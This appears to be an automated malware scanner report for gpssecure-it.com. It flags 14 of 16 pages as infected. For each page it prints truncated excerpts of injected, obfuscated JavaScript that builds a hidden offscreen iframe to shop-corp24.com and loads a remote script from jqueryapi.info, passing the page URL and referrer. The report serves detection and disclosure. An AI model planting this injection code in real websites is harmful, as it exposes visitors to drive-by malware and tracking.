Malware Scanner report for gpssecure-it.com

Malicious/Suspicious/Total urls checked: 14/0/16

14 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "gpssecure-it.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gpssecure-it.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://gpssecure-it.com/	HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 11 Oct 2014 14:32:28 GMT Location: http://www.gpssecure-it.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.gpssecure-it.com/xmlrpc.php X-Powered-By: PHP/5.2.13	clean
http://www.gpssecure-it.com/	200 OK Content-Length: 19196 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/about-us/	200 OK Content-Length: 16886 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/products/	200 OK Content-Length: 20808 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/products/gps-for-mobile-assets/	200 OK Content-Length: 17168 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/products/fleet-management-system/	200 OK Content-Length: 19025 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/products/on-patrol/	200 OK Content-Length: 17420 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/products/personal-security/	200 OK Content-Length: 16397 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/products/buy-here-pay-here/	200 OK Content-Length: 17912 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/troubleshoot/	200 OK Content-Length: 19051 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/faq/	200 OK Content-Length: 18032 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/contact/	200 OK Content-Length: 15080 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/login/	200 OK Content-Length: 17240 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/purchase/	200 OK Content-Length: 16312 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 